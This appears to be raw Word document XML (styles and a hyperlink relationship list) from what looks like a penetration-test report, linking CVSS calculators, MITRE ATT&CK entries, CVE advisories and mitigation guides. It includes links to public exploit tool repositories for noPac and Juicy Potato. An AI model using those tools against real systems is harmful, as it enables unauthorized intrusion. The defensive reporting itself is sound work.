    <w:rsid w:val="7A64F257"/>
    <w:rsid w:val="7A738FC6"/>
    <w:rsid w:val="7A787B0E"/>
    <w:rsid w:val="7A8CB30E"/>
    <w:rsid w:val="7A9CBE38"/>
    <w:rsid w:val="7A9EB002"/>
    <w:rsid w:val="7AA0B36B"/>
    <w:rsid w:val="7AA56231"/>
    <w:rsid w:val="7AA80C4D"/>
    <w:rsid w:val="7AAAD632"/>
    <w:rsid w:val="7AB66594"/>
    <w:rsid w:val="7AB93001"/>
    <w:rsid w:val="7AC5E84C"/>
    <w:rsid w:val="7AC64624"/>
    <w:rsid w:val="7AD135DA"/>
    <w:rsid w:val="7AE8FF53"/>
    <w:rsid w:val="7AED417B"/>
    <w:rsid w:val="7AEDFDAA"/>
    <w:rsid w:val="7AEF0A5C"/>
    <w:rsid w:val="7AF7B35F"/>
    <w:rsid w:val="7AFA0D01"/>
    <w:rsid w:val="7B0ACD3E"/>
    <w:rsid w:val="7B18476A"/>
    <w:rsid w:val="7B1AD568"/>
    <w:rsid w:val="7B1CC331"/>
    <w:rsid w:val="7B2559BB"/>
    <w:rsid w:val="7B366DAC"/>
    <w:rsid w:val="7B49D04D"/>
    <w:rsid w:val="7B4A46A8"/>
    <w:rsid w:val="7B4CEE7B"/>
    <w:rsid w:val="7B4CF83E"/>
    <w:rsid w:val="7B4F8D49"/>
    <w:rsid w:val="7B5851EB"/>
    <w:rsid w:val="7B5908D8"/>
    <w:rsid w:val="7B5BF7ED"/>
    <w:rsid w:val="7B5BF96E"/>
    <w:rsid w:val="7B61BCA5"/>
    <w:rsid w:val="7B64DD24"/>
    <w:rsid w:val="7B6E3789"/>
    <w:rsid w:val="7B6E795D"/>
    <w:rsid w:val="7B6EB47F"/>
    <w:rsid w:val="7B7B51E2"/>
    <w:rsid w:val="7B873A05"/>
    <w:rsid w:val="7B91E9D1"/>
    <w:rsid w:val="7B9B2C9E"/>
    <w:rsid w:val="7B9C0880"/>
    <w:rsid w:val="7BA0CB79"/>
    <w:rsid w:val="7BAF9F6A"/>
    <w:rsid w:val="7BB289E5"/>
    <w:rsid w:val="7BB478FC"/>
    <w:rsid w:val="7BBCEED0"/>
    <w:rsid w:val="7BC48A8E"/>
    <w:rsid w:val="7BC5C9A7"/>
    <w:rsid w:val="7BC764B9"/>
    <w:rsid w:val="7BC815B3"/>
    <w:rsid w:val="7BCE5EC1"/>
    <w:rsid w:val="7BDBE227"/>
    <w:rsid w:val="7BED5D75"/>
    <w:rsid w:val="7BF27458"/>
    <w:rsid w:val="7BF920B4"/>
    <w:rsid w:val="7BFA3C41"/>
    <w:rsid w:val="7C016350"/>
    <w:rsid w:val="7C0684CD"/>
    <w:rsid w:val="7C0F5A9C"/>
    <w:rsid w:val="7C16BBCE"/>
    <w:rsid w:val="7C20553A"/>
    <w:rsid w:val="7C217EDA"/>
    <w:rsid w:val="7C21F550"/>
    <w:rsid w:val="7C286E5A"/>
    <w:rsid w:val="7C3D5144"/>
    <w:rsid w:val="7C41190A"/>
    <w:rsid w:val="7C44D52B"/>
    <w:rsid w:val="7C456F97"/>
    <w:rsid w:val="7C466FAF"/>
    <w:rsid w:val="7C472A00"/>
    <w:rsid w:val="7C495552"/>
    <w:rsid w:val="7C4C0595"/>
    <w:rsid w:val="7C4F72F6"/>
    <w:rsid w:val="7C5259AD"/>
    <w:rsid w:val="7C58DF2E"/>
    <w:rsid w:val="7C609ACB"/>
    <w:rsid w:val="7C60FFB1"/>
    <w:rsid w:val="7C652FD8"/>
    <w:rsid w:val="7C71E79D"/>
    <w:rsid w:val="7C7D3AFB"/>
    <w:rsid w:val="7C840544"/>
    <w:rsid w:val="7C9E1A8C"/>
    <w:rsid w:val="7CA3AFB0"/>
    <w:rsid w:val="7CAA9399"/>
    <w:rsid w:val="7CB26F09"/>
    <w:rsid w:val="7CCEDEEE"/>
    <w:rsid w:val="7CD0AE12"/>
    <w:rsid w:val="7CD5210C"/>
    <w:rsid w:val="7CE2D7CE"/>
    <w:rsid w:val="7CE43C0E"/>
    <w:rsid w:val="7CE45330"/>
    <w:rsid w:val="7CE79596"/>
    <w:rsid w:val="7CE7F031"/>
    <w:rsid w:val="7CF08186"/>
    <w:rsid w:val="7CF23455"/>
    <w:rsid w:val="7CF3250B"/>
    <w:rsid w:val="7CF59C03"/>
    <w:rsid w:val="7CFA054C"/>
    <w:rsid w:val="7CFAC678"/>
    <w:rsid w:val="7CFC3537"/>
    <w:rsid w:val="7D0B6B1C"/>
    <w:rsid w:val="7D0C9BAB"/>
    <w:rsid w:val="7D0F7F5C"/>
    <w:rsid w:val="7D0F8846"/>
    <w:rsid w:val="7D1242ED"/>
    <w:rsid w:val="7D18BFF9"/>
    <w:rsid w:val="7D232BFC"/>
    <w:rsid w:val="7D25FB71"/>
    <w:rsid w:val="7D27CA1B"/>
    <w:rsid w:val="7D301C5C"/>
    <w:rsid w:val="7D38CD5F"/>
    <w:rsid w:val="7D444796"/>
    <w:rsid w:val="7D44E918"/>
    <w:rsid w:val="7D4C9C9B"/>
    <w:rsid w:val="7D4DBBC2"/>
    <w:rsid w:val="7D54A65A"/>
    <w:rsid w:val="7D5C0DB8"/>
    <w:rsid w:val="7D5EF3DC"/>
    <w:rsid w:val="7D62D7E3"/>
    <w:rsid w:val="7D62F2B8"/>
    <w:rsid w:val="7D70FFF6"/>
    <w:rsid w:val="7D7EB3A9"/>
    <w:rsid w:val="7D921452"/>
    <w:rsid w:val="7D999CB6"/>
    <w:rsid w:val="7D9A1330"/>
    <w:rsid w:val="7D9DC15A"/>
    <w:rsid w:val="7DAA46A1"/>
    <w:rsid w:val="7DAA55C6"/>
    <w:rsid w:val="7DAC9B0F"/>
    <w:rsid w:val="7DB041A4"/>
    <w:rsid w:val="7DB660BF"/>
    <w:rsid w:val="7DC9D719"/>
    <w:rsid w:val="7DCC7489"/>
    <w:rsid w:val="7DD5E629"/>
    <w:rsid w:val="7DE237FC"/>
    <w:rsid w:val="7DE3DCBC"/>
    <w:rsid w:val="7DE4360B"/>
    <w:rsid w:val="7DE860A9"/>
    <w:rsid w:val="7DF7AB6F"/>
    <w:rsid w:val="7DFBE8E1"/>
    <w:rsid w:val="7E07A583"/>
    <w:rsid w:val="7E0C8D6E"/>
    <w:rsid w:val="7E24F0E8"/>
    <w:rsid w:val="7E273751"/>
    <w:rsid w:val="7E346193"/>
    <w:rsid w:val="7E3B85DB"/>
    <w:rsid w:val="7E424E4D"/>
    <w:rsid w:val="7E49CF31"/>
    <w:rsid w:val="7E4AA3EC"/>
    <w:rsid w:val="7E517DDE"/>
    <w:rsid w:val="7E60F6A5"/>
    <w:rsid w:val="7E81E185"/>
    <w:rsid w:val="7E824224"/>
    <w:rsid w:val="7E8A3021"/>
    <w:rsid w:val="7E9348A8"/>
    <w:rsid w:val="7E9A9BD7"/>
    <w:rsid w:val="7E9C7CF5"/>
    <w:rsid w:val="7EB956B2"/>
    <w:rsid w:val="7EBE1FC1"/>
    <w:rsid w:val="7EC085E8"/>
    <w:rsid w:val="7EC62793"/>
    <w:rsid w:val="7ECA216D"/>
    <w:rsid w:val="7ECA76A1"/>
    <w:rsid w:val="7ECAA872"/>
    <w:rsid w:val="7EE2C701"/>
    <w:rsid w:val="7EE784F4"/>
    <w:rsid w:val="7EECF478"/>
    <w:rsid w:val="7EEDAEC3"/>
    <w:rsid w:val="7EEF2B73"/>
    <w:rsid w:val="7EFD8572"/>
    <w:rsid w:val="7EFF8A7B"/>
    <w:rsid w:val="7EFFD6A7"/>
    <w:rsid w:val="7F025F29"/>
    <w:rsid w:val="7F032854"/>
    <w:rsid w:val="7F0BEDA5"/>
    <w:rsid w:val="7F0EBC66"/>
    <w:rsid w:val="7F0F2A79"/>
    <w:rsid w:val="7F37975F"/>
    <w:rsid w:val="7F3FFC30"/>
    <w:rsid w:val="7F426244"/>
    <w:rsid w:val="7F45A038"/>
    <w:rsid w:val="7F49AA0C"/>
    <w:rsid w:val="7F4C11E4"/>
    <w:rsid w:val="7F54104E"/>
    <w:rsid w:val="7F58DF56"/>
    <w:rsid w:val="7F5DF6AB"/>
    <w:rsid w:val="7F7DD9B6"/>
    <w:rsid w:val="7F8632D6"/>
    <w:rsid w:val="7F903D8C"/>
    <w:rsid w:val="7F93A12E"/>
    <w:rsid w:val="7FA9E14F"/>
    <w:rsid w:val="7FA9FE88"/>
    <w:rsid w:val="7FAE541E"/>
    <w:rsid w:val="7FB2E949"/>
    <w:rsid w:val="7FB90F1C"/>
    <w:rsid w:val="7FBBE6C7"/>
    <w:rsid w:val="7FC2AD73"/>
    <w:rsid w:val="7FD923B4"/>
    <w:rsid w:val="7FE0CE16"/>
    <w:rsid w:val="7FEF069E"/>
    <w:rsid w:val="7FEF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4F763"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F80DCDE0-B5BC-4E86-90EE-CB0F121E68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D325B6E"/>
    <w:pPr>
      <w:spacing/>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:uiPriority w:val="99"/>
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0D325B6E"/>
    <w:rPr>
      <w:color w:val="467886"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:uiPriority w:val="9"/>
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:qFormat/>
    <w:rsid w:val="0D325B6E"/>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0D325B6E"/>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itle">
    <w:uiPriority w:val="10"/>
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="0D325B6E"/>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0D325B6E"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:uiPriority w:val="1"/>
    <w:name w:val="No Spacing"/>
    <w:qFormat/>
    <w:rsid w:val="0D325B6E"/>
    <w:pPr>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a0bd44e539214b5e" /><Relationship Type="http://schemas.microsoft.com/office/2011/relationships/people" Target="people.xml" Id="R6bd81dc1d4814f00" /><Relationship Type="http://schemas.microsoft.com/office/2011/relationships/commentsExtended" Target="commentsExtended.xml" Id="R6a4c6e88efa945e1" /><Relationship Type="http://schemas.microsoft.com/office/2016/09/relationships/commentsIds" Target="commentsIds.xml" Id="R32d368740d98419c" /><Relationship Type="http://schemas.microsoft.com/office/2018/08/relationships/commentsExtensible" Target="commentsExtensible.xml" Id="Rc9bf70302bc94d4a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="R30369df608ce43f9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="Rdab672219c8f4a76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1110/003/" TargetMode="External" Id="R16f4f958310d4817" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1027/" TargetMode="External" Id="Re2f57a91dc3e4bb3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1032/" TargetMode="External" Id="R6ae11722d7e14b64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.digicert.com/blog/creating-password-policy-best-practices" TargetMode="External" Id="Rcc5fc4af1c204938" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.linode.com/docs/guides/how-to-use-fail2ban-for-ssh-brute-force-protection/" TargetMode="External" Id="R89811eee426f428e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.paloaltonetworks.com/cyberpedia/what-is-mfa-implementation" TargetMode="External" Id="R66431b36f9224cf3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="R514a73b92ed347dc" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1110/003/" TargetMode="External" Id="Rba4daea314274057" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078/" TargetMode="External" Id="Rfbd2d93eae8d4d76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1027/" TargetMode="External" Id="R892b85e25ca943b8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1032/" TargetMode="External" Id="R7862bce348ef43f7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisa.gov/resources-tools/training/cyb3rsmrt-use-password-manager-create-and-remember-strong-passwords" TargetMode="External" Id="R569c771aed3845f3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.paloaltonetworks.com/cyberpedia/what-is-mfa-implementation" TargetMode="External" Id="R4dac82af6b074811" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1595/" TargetMode="External" Id="R951735d4bc074c1c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1037/" TargetMode="External" Id="Refbe412c20ef47bc" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1056/" TargetMode="External" Id="R92fed6ca64d643e5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csrc.nist.gov/pubs/sp/800/41/r1/final" TargetMode="External" Id="R800d1ff7fd074a24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://phoenixnap.com/kb/configure-firewall-with-ufw-on-ubuntu" TargetMode="External" Id="R203c91259c834dfd" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/en-us/windows/turn-microsoft-defender-firewall-on-or-off-ec0844f7-aebd-0583-67fe-601ecf5d774f" TargetMode="External" Id="R7cfc6076360c4d11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="Rd0c48dc008f64fa2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/" TargetMode="External" Id="R42d147304b9841b3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1038/" TargetMode="External" Id="R163870bda678475e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1050/" TargetMode="External" Id="R0914e3e0f2fd4ef4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1048/" TargetMode="External" Id="Re7801f02fcd04778" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://jinja.palletsprojects.com/en/stable/api/" TargetMode="External" Id="R31331bc353f84dcf" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.paloaltonetworks.com/cyberpedia/what-is-a-web-application-firewall" TargetMode="External" Id="R2a5c96fd65384969" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="Rf825ef4017584dba" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1210/" TargetMode="External" Id="R0d8564cd65944aa5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1051/" TargetMode="External" Id="Rc3b1825d35a64083" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1016/" TargetMode="External" Id="Rb0062581de954dcb" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/en-us/blog/cve-2020-1472-zerologon-security-advisory/" TargetMode="External" Id="R4e99d9fee7484bcd" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2020-1472" TargetMode="External" Id="R8be41791a2e54294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/cve-2020-1472" TargetMode="External" Id="R3b0da8d92b444817" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="Rb236b1a267b34e23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1210/" TargetMode="External" Id="Rba9bb46345f1468c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1051/" TargetMode="External" Id="Re2ce41cd02794923" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1016/" TargetMode="External" Id="R3ac705edd0144be3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sentinelone.com/blog/eternalblue-nsa-developed-exploit-just-wont-die/" TargetMode="External" Id="Rf7276996cdcf4fbc" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/cve-2017-0144" TargetMode="External" Id="R009108e96b7a478c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="Re3652ffc91824a72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1068/" TargetMode="External" Id="R9eeadc5e3f5e4910" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1051" TargetMode="External" Id="R3715b9994dda48bb" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Ridter/noPac" TargetMode="External" Id="R9ce564052f034ed6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/blog/nopac-a-tale-of-two-vulnerabilities-that-could-end-in-ransomware" TargetMode="External" Id="Rc89a087316954a98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42278" TargetMode="External" Id="Rafb2a5b56faa4cc9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42287" TargetMode="External" Id="R22cd48a2a71c4671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="R32efaf989447453a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1530/" TargetMode="External" Id="Raf74210389d24b54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="Re3af8bd0563a4c99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552/001/" TargetMode="External" Id="R58e29d529b924a7f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1047" TargetMode="External" Id="R57832e03653e4b2c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1022" TargetMode="External" Id="R93a79b8773214533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.nccoe.nist.gov/data-confidentiality-identifying-and-protecting-assets-against-data-breaches" TargetMode="External" Id="R472a8aba83724e43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="Rf216a722c5d04747" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1068/" TargetMode="External" Id="R0cb36c37bc424764" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1051" TargetMode="External" Id="Ref860ed2e26a420d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ohpe/juicy-potato" TargetMode="External" Id="R3acef2642cad4d7c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/defender-endpoint/behavioral-blocking-containment" TargetMode="External" Id="R7e04874b2d0541c0" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="R06181e01d0d04ae2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1068/" TargetMode="External" Id="Re955ac900d924bfc" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1134/001/" TargetMode="External" Id="R143126dbebfb406e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1026/" TargetMode="External" Id="R3b71068cd6fd40f0" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/windows/win32/secauthz/access-tokens" TargetMode="External" Id="R35f2280928d640fe" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection" TargetMode="External" Id="Rdbffcf14db384e5b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="R0afb44f414934df1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1190/" TargetMode="External" Id="R8c359b2b8b2e4121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1203/" TargetMode="External" Id="R3983786a0c3645fe" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1038/" TargetMode="External" Id="Rc489a7de7f2a42c2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1048/" TargetMode="External" Id="R19618db6ebfd4b44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/Command_Injection" TargetMode="External" Id="R79ba166341344f2a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/os-command-injection" TargetMode="External" Id="R129846dc624947ed" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.paloaltonetworks.com/cyberpedia/what-is-a-web-application-firewall" TargetMode="External" Id="R0cea3f3bf51f42f2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="Ref796ac5319f4bbe" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1110/003/" TargetMode="External" Id="R4f43f1d38f97430d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1110/001/" TargetMode="External" Id="R4b06640cab664194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1027/" TargetMode="External" Id="Rdac01cf63d424694" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.digicert.com/blog/creating-password-policy-best-practices" TargetMode="External" Id="Rd9bf676c4f684dd8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="R65e8eff61f8a40cd" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1649/" TargetMode="External" Id="R0c5f9aabfae145b1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1015/" TargetMode="External" Id="R278dafa5a50e4b54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1047/" TargetMode="External" Id="R3ef1990bcbf44d07" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:john@corp.local" TargetMode="External" Id="Rf7563eb9f96c4a23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:john@corp.local" TargetMode="External" Id="R20131e94c7174ab7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:administrator@corp.local" TargetMode="External" Id="Rf108266dead545d2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/defender-for-identity/security-assessment-prevent-users-request-certificate" TargetMode="External" Id="R0b746ab8f94a4ddc" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/en-us/resources/white-papers/investigating-active-directory-certificate-services-abuse-esc1/" TargetMode="External" Id="Rad3cbafc7a5348e9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1110/" TargetMode="External" Id="Re9ee06990b034cdd" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1032/" TargetMode="External" Id="R64c0cdef90fb497d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.paloaltonetworks.com/cyberpedia/what-is-mfa-implementation" TargetMode="External" Id="R97da661c99f949ba" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="R270a54bfe1d543e9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1190/" TargetMode="External" Id="Rb573a2a427014984" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1048" TargetMode="External" Id="R4bffcbb82a3f4725" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1054/" TargetMode="External" Id="R34b5cf48f23a4b1f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/deserialization" TargetMode="External" Id="Rd1945fc0f0e0484c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/4-0" TargetMode="External" Id="R996ca15a8cea4574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1190/" TargetMode="External" Id="R68e1aa2c0b824116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1051/" TargetMode="External" Id="R119a545f904f42fa" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/en-gb/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429" TargetMode="External" Id="R8c78e3bfa7784039" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 